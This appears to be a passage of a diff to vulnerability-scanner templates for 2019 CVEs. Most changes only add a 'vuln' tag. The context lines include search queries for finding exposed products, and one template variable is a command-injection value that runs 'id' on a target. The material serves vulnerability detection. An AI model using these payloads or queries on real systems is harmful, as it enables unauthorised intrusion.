a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -31,7 +31,7 @@ info: - "server: labkey" fofa-query: 'title="sign in: /home"' google-query: 'intitle:"sign in: /home"' - tags: cve,cve2019,xss,labkey,tenable + tags: cve,cve2019,xss,labkey,tenable,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 96dd22a1db4..a21e9821143 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -33,7 +33,7 @@ info: - "server: labkey" fofa-query: 'title="sign in: /home"' google-query: 'intitle:"sign in: /home"' - tags: cve2019,cve,tenable,redirect,labkey + tags: cve2019,cve,tenable,redirect,labkey,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index c6e142ae2c5..c9060c71773 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: crestron product: am-100_firmware - tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron,vkev + tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron,vkev,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index 274ec00c68d..3234ec2770b 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -27,7 +27,7 @@ info: max-request: 4 vendor: youphptube product: youphptube_encoder - tags: cve,cve2019,rce,youphptube,vkev + tags: cve,cve2019,rce,youphptube,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" encode: "`id > {{filename}}.txt`" diff --git a/http/cves/2019/CVE-2019-5128.yaml b/http/cves/2019/CVE-2019-5128.yaml index b1dcf813680..4585ec8207b 100644 --- a/http/cves/2019/CVE-2019-5128.yaml +++ b/http/cves/2019/CVE-2019-5128.yaml @@ -21,7 +21,7 @@ info: vendor: youphptube product: youphptube_encoder fofa-query: icon_hash="-276846707" - tags: cve,cve2019,youphptube,intrusive,encoder,vkev + tags: cve,cve2019,youphptube,intrusive,encoder,vkev,vuln variables: file_name: "{{rand_text_alpha(4)}}.txt" diff --git a/http/cves/2019/CVE-2019-5129.yaml b/http/cves/2019/CVE-2019-5129.yaml index cccde89ebd2..e65a7d4f4c7 100644 --- a/http/cves/2019/CVE-2019-5129.yaml +++ b/http/cves/2019/CVE-2019-5129.yaml @@ -21,7 +21,7 @@ info: vendor: youphptube product: youphptube_encoder fofa-query: icon_hash="-276846707" - tags: cve,cve2019,youphptube,rce,encoder,vkev + tags: cve,cve2019,youphptube,rce,encoder,vkev,vuln variables: file_name: "{{rand_text_alpha(4)}}.txt" diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index f240a40b65e..c766c64710a 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -28,7 +28,7 @@ info: vendor: rubyonrails product: rails shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" - tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails,kev,vkev + tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index f9446b1df23..775842861fe 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -36,7 +36,7 @@ info: - icon_hash=106844876 - title="revive adserver" google-query: intitle:"revive adserver" - tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas + tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index 9ea14883a3b..0afc1d7c79b 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -28,7 +28,7 @@ info: vendor: graphpaperpress product: sell_media framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,xss,graphpaperpress + tags: cve,cve2019,wordpress,wp-plugin,xss,graphpaperpress,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 52d6798ac10..127bda2294f 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve,cve2019,drupal,rce,kev,vkev + tags: cve,cve2019,drupal,rce,kev,vkev,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-6703.yaml b/http/cves/2019/CVE-2019-6703.yaml index 21ae999aee9..51ed7fd6bd0 100644 --- a/http/cves/2019/CVE-2019-6703.yaml +++ b/http/cves/2019/CVE-2019-6703.yaml @@ -26,7 +26,7 @@ info: product: total_donations framework: wordpress fofa-query: body="/wp-content/plugins/total-donations/" - tags: cve,cve2019,wpscan,wordpress,wp,wp-plugin,total-donations,passive,vkev + tags: cve,cve2019,wpscan,wordpress,wp,wp-plugin,total-donations,passive,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index 9bf14850759..67fa95e73cc 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -28,7 +28,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,ssrf,packetstorm,intrusive,boldgrid + tags: cve,cve2019,wordpress,wp-plugin,ssrf,packetstorm,intrusive,boldgrid,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-6793.yaml b/http/cves/2019/CVE-2019-6793.yaml index e10580bfd18..c58e441b170 100644 --- a/http/cves/2019/CVE-2019-6793.yaml +++ b/http/cves/2019/CVE-2019-6793.yaml @@ -23,7 +23,7 @@ info: product: gitlab shodan-query: html:"GitLab Enterprise Edition" fofa-query: body="GitLab Enterprise Edition" - tags: cve,cve2019,gitlab,enterprise,ssrf,blind + tags: cve,cve2019,gitlab,enterprise,ssrf,blind,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 7ff1bc46d63..6cc615a720b 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -41,7 +41,7 @@ info: hunter-query: - app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" - app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli + tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 447abfaa3b6..6778c355330 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -31,7 +31,7 @@ info: - html:"pypiserver" - http.html:"pypiserver" fofa-query: body="pypiserver" - tags: cve,cve2019,crlf,pypiserver,python + tags: cve,cve2019,crlf,pypiserver,python,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index e97608bf566..a4124afd3f9 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -32,7 +32,7 @@ info: - http.component:"Magento" - cpe:"cpe:2.3:a:magento:magento" - http.component:"magento" - tags: time-based-sqli,cve,cve2019,sqli,magento,vkev + tags: time-based-sqli,cve,cve2019,sqli,magento,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 5a776150c1a..0b0c06d1d54 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -40,7 +40,7 @@ info: google-query: - intitle:"qnap" - intitle:"photo station" - tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss,vkev + tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-7194.yaml b/http/cves/2019/CVE-2019-7194.yaml index ba83d26f627..7fdeb502fbd 100644 --- a/http/cves/2019/CVE-2019-7194.yaml +++ b/http/cves/2019/CVE-2019-7194.yaml @@ -32,7 +32,7 @@ info: google-query: - intitle:"photo station" - intitle:"qnap" - tags: cve,cve2019,qnap,rce,photostation,unauth,injection,lfi,kev,intrusive,vkev + tags: cve,cve2019,qnap,rce,photostation,unauth,injection,lfi,kev,intrusive,vkev,vuln variables: cleanup_payload: "" diff --git a/http/cves/2019/CVE-2019-7195.yaml b/http/cves/2019/CVE-2019-7195.yaml index 331aba76a27..a348334acd5 100644 --- a/http/cves/2019/CVE-2019-7195.yaml +++ b/http/cves/2019/CVE-2019-7195.yaml @@ -34,7 +34,7 @@ info: google-query: - intitle:"photo station" - intitle:"qnap" - tags: cve,cve2019,kev,qnap,lfi,vkev + tags: cve,cve2019,kev,qnap,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index 8bd66ef30c1..4f89d6f1ecc 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zarafa product: webaccess - tags: cve,cve2019,zarafa,xss + tags: cve,cve2019,zarafa,xss,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 29c07b2d4b4..48af627362c 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -27,7 +27,7 @@ info: vendor: sonatype product: nexus fofa-query: title="nexus repository manager" - tags: cve,cve2019,nexus,rce,kev,sonatype,vkev + tags: cve,cve2019,nexus,rce,kev,sonatype,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index faf4cf306f7..8745175be7a 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" - tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol,vkev + tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 77fb34c1ad9..815dbc2fcab 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -34,7 +34,7 @@ info: - http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" - tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol + tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index aca4e48796d..d4544257b12 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -34,7 +34,7 @@ info: - http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" - tags: cve,cve2019,emerge,rce,edb,nortekcontrol,kev,vkev + tags: cve,cve2019,emerge,rce,edb,nortekcontrol,kev,vkev,vuln variables: file: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 2930d9d6e70..572b6f7c200 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: optergy product: enterprise - tags: cve,cve2019,redirect,packetstorm,optergy + tags: cve,cve2019,redirect,packetstorm,optergy,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-7276.yaml b/http/cves/2019/CVE-2019-7276.yaml index b0d1ad70821..bcca3265180 100644 --- a/http/cves/2019/CVE-2019-7276.yaml +++ b/http/cves/2019/CVE-2019-7276.yaml @@ -23,7 +23,7 @@ info: vendor: optergy product: enterprise,proton shodan-query: html:"Optergy" - tags: cve,cve2019,optergy,proton,backdoor,rce,intrusive,vkev + tags: cve,cve2019,optergy,proton,backdoor,rce,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index 7a64f9ea4d5..ddc38725977 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: genieaccess product: wip3bvaf - tags: cve,cve2019,camera,genie,lfi,iot,genieaccess + tags: cve,cve2019,camera,genie,lfi,iot,genieaccess,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index a7dd7fffd82..17bae485ac9 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sonicwall product: sma_100_firmware - tags: cve,cve2019,sonicwall,sqli,kev,vkev + tags: cve,cve2019,sonicwall,sqli,kev,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index c97179797c4..74afc828eeb 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: kindsoft product: kindeditor - tags: cve,cve2019,kindeditor,xss,kindsoft + tags: cve,cve2019,kindeditor,xss,kindsoft,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 38531e3a5fb..4f0cf7113d0 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"kibana" fofa-query: title="kibana" google-query: intitle:"kibana" - tags: cve,cve2019,kibana,rce,kev,elastic,vkev + tags: cve,cve2019,kibana,rce,kev,elastic,vkev,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index db3537b0e71..e0b7970e6c7 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -35,7 +35,7 @@ info: - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" - tags: cve,cve2019,aem,adobe + tags: cve,cve2019,aem,adobe,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index c16670fed20..ca6677887f4 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -31,7 +31,7 @@ info: product: qdpm shodan-query: http.favicon.hash:762074255 fofa-query: icon_hash=762074255 - tags: cve,cve2019,xss,qdpm,authenticated,edb + tags: cve,cve2019,xss,qdpm,authenticated,edb,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index e2a74d1b1fe..e77ffcdd48e 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -31,7 +31,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2019,atlassian,jira,lfi,intrusive,vkev + tags: cve,cve2019,atlassian,jira,lfi,intrusive,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 7c7fe665f24..06d8cade8bb 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2019,jira,atlassian,vkev + tags: cve,cve2019,jira,atlassian,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 4c884371526..8f476b4fb19 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -32,7 +32,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2019,atlassian,jira,disclosure,packetstorm + tags: cve,cve2019,atlassian,jira,disclosure,packetstorm,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index 961a58b3003..ac68d0988ab 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone,vkev + tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone,vkev,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index a2be2c22fee..f4add497876 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -28,7 +28,7 @@ info: vendor: totaljs product: total.js framework: node.js - tags: cve2019,cve,totaljs,lfi,node.js + tags: cve2019,cve,totaljs,lfi,node.js,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index ee98a79c8d1..6004f182653 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -35,7 +35,7 @@ info: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid + tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-8943.yaml b/http/cves/2019/CVE-2019-8943.yaml index 889623c37a2..4b7bee0f801 100644 --- a/http/cves/2019/CVE-2019-8943.yaml +++ b/http/cves/2019/CVE-2019-8943.yaml @@ -28,7 +28,7 @@ info: - http.component:"wordpress" - cpe:"cpe:2.3:a:wordpress:wordpress" fofa-query: body="oembed" && body="wp-" - tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme + tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme,vuln variables: image_filename: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 955b3d5ff0c..c0c280393e4 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: wavemaker product: wavemarker_studio - tags: cve,cve2019,wavemaker,lfi,ssrf,edb,vkev + tags: cve,cve2019,wavemaker,lfi,ssrf,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 353229b261b..057591049c6 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: zzzcms product: zzzphp - tags: cve,cve2019,zzzcms,rce,edb + tags: cve,cve2019,zzzcms,rce,edb,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-9194.yaml b/http/cves/2019/CVE-2019-9194.yaml index bf1a5c67811..595a9c64b25 100644 --- a/http/cves/2019/CVE-2019-9194.yaml +++ b/http/cves/2019/CVE-2019-9194.yaml @@ -27,7 +27,7 @@ info: vendor: studio-42 product: elfinder shodan-query: 'http.title:"elfinder"' - tags: cve,cve2019,elfinder,rce,intrusive,file-upload,vkev + tags: cve,cve2019,elfinder,rce,intrusive,file-upload,vkev,vuln variables: rand_string: '{{to_lower(rand_text_alpha(6))}}' diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index 9955acd60b7..208e244b5df 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -26,7 +26,7 @@ info: vendor: gracemedia_media_player_project product: gracemedia_media_player framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,lfi,seclists,edb,gracemedia_media_player_project,vkev + tags: cve,cve2019,wordpress,wp-plugin,lfi,seclists,edb,gracemedia_media_player_project,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-9621.yaml b/http/cves/2019/CVE-2019-9621.yaml index 0d00ae779e5..a7c81558c63 100644 --- a/http/cves/2019/CVE-2019-9621.yaml +++ b/http/cves/2019/CVE-2019-9621.yaml @@ -26,7 +26,7 @@ info: vendor: zimbra product: collaboration_server shodan-query: html:"Zimbra Collaboration Suite Web Client" - tags: cve,cve2019,zimbra,collaboration-server,oast,oob,xxe,kev,vkev + tags: cve,cve2019,zimbra,collaboration-server,oast,oob,xxe,kev,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-9632.yaml b/http/cves/2019/CVE-2019-9632.yaml index 5435f812c99..bfde965cb34 100644 --- a/http/cves/2019/CVE-2019-9632.yaml +++ b/http/cves/2019/CVE-2019-9632.yaml @@ -21,7 +21,7 @@ info: vendor: esafenet product: "electronic_document_security_management_system" fofa-query: "title=\"电子文档安全管理系统\"" - tags: cve,cve2019,esafenet,lfi + tags: cve,cve2019,esafenet,lfi,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index 191b312e8b3..2fd266c4fd7 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -38,7 +38,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor,vkev + tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index 0b6fe170885..fbbb07d68f3 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: eq-3 product: ccu3_firmware - tags: cve2019,cve,homematic,lfi,eq-3 + tags: cve2019,cve,homematic,lfi,eq-3,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index a6b3cea355d..105679c038f 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -27,7 +27,7 @@ info: vendor: jfrog product: artifactory shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory" - tags: cve,cve2019,packetstorm,artifactory,login,jfrog,vkev + tags: cve,cve2019,packetstorm,artifactory,login,jfrog,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-9757.yaml b/http/cves/2019/CVE-2019-9757.yaml index 2983bf716de..1bfcd66211b 100644 --- a/http/cves/2019/CVE-2019-9757.yaml +++ b/http/cves/2019/CVE-2019-9757.yaml @@ -24,7 +24,7 @@ info: product: labkey_server shodan-query: title:"LabKey" fofa-query: title="LabKey" - tags: cve,cve2019,labkey,xxe,authenticated + tags: cve,cve2019,labkey,xxe,authenticated,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2019/CVE-2019-9762.yaml b/http/cves/2019/CVE-2019-9762.yaml index 8fa1a3b4d21..6697828770b 100644 --- a/http/cves/2019/CVE-2019-9762.yaml +++ b/http/cves/2019/CVE-2019-9762.yaml @@ -23,7 +23,7 @@ info: vendor: phpshe product: phpshe fofa-query: app="PHPSHE" - tags: cve,cve2019,phpshe,sqli,vkev + tags: cve,cve2019,phpshe,sqli,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2019/CVE-2019-9874.yaml b/http/cves/2019/CVE-2019-9874.yaml index da1292c8c78..1d3250e1363 100644 --- a/http/cves/2019/CVE-2019-9874.yaml +++ b/http/cves/2019/CVE-2019-9874.yaml @@ -24,7 +24,7 @@ info: product: experience_platform shodan-query: http.html:"SitecoSitecore Experience Platform" fofa-query: body="Sitecore Experience Platform" - tags: cve,cve2019,sitecore,deserialization,rce,kev,vkev + tags: cve,cve2019,sitecore,deserialization,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-9879.yaml b/http/cves/2019/CVE-2019-9879.yaml index eed5b41c20b..6b60813a2eb 100644 --- a/http/cves/2019/CVE-2019-9879.yaml +++ b/http/cves/2019/CVE-2019-9879.yaml @@ -25,7 +25,7 @@ info: product: wpgraphql framework: wordpress fofa-query: body="/wp-content/plugins/wp-graphql/" - tags: cve,cve2019,wp-graphql,wpengine,wordpress,wp-plugin,intrusive,vkev + tags: cve,cve2019,wp-graphql,wpengine,wordpress,wp-plugin,intrusive,vkev,vuln variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" diff --git a/http/cves/2019/CVE-2019-9880.yaml b/http/cves/2019/CVE-2019-9880.yaml index 84077f74224..9bec063d49a 100644 --- a/http/cves/2019/CVE-2019-9880.yaml +++ b/http/cves/2019/CVE-2019-9880.yaml @@ -31,7 +31,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/wp-graphql/" publicwww-query: "/wp-content/plugins/wp-graphql/" - tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak,vkev + tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-9881.yaml b/http/cves/2019/CVE-2019-9881.yaml index 146c365b251..95bb803e4bf 100644 --- a/http/cves/2019/CVE-2019-9881.yaml +++ b/http/cves/2019/CVE-2019-9881.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.title:"WordPress" "graphql" fofa-query: body="/wp-content/plugins/wp-graphql/" publicwww-query: "/wp-content/plugins/wp-graphql/" - tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,vkev + tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,vkev,vuln variables: string: "{{randstr}}" diff --git a/http/cves/2019/CVE-2019-9912.yaml b/http/cves/2019/CVE-2019-9912.yaml index fe624c01d47..aa654fd2733 100644 --- a/http/cves/2019/CVE-2019-9912.yaml +++ b/http/cves/2019/CVE-2019-9912.yaml @@ -24,7 +24,7 @@ info: fofa-query: body="/wp-content/plugins/wp-google-maps" vendor: codecabin product: wp_go_maps - tags: cve,cve2019,wp,wp-plugin,wordpress,xss,wp-go-maps + tags: cve,cve2019,wp,wp-plugin,wordpress,xss,wp-go-maps,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 6a763dff1e2..b1801cd7db1 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: get-simple. product: getsimplecms - tags: cve,cve2019,redirect,getsimple,cms,get-simple. + tags: cve,cve2019,redirect,getsimple,cms,get-simple.,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index 01025da5a65..cbfd73017ad 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -28,7 +28,7 @@ info: vendor: harmistechnology product: je_messenger framework: joomla\! - tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla + tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index d192e79ad2e..429aae30dd9 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: zyxel product: atp200_firmware - tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss + tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index f094c7ef4ea..99775c711c9 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -27,7 +27,7 @@ info: product: social_warfare framework: wordpress fofa-query: body="social-warfare" && body="wp-" - tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss,vkev + tags: 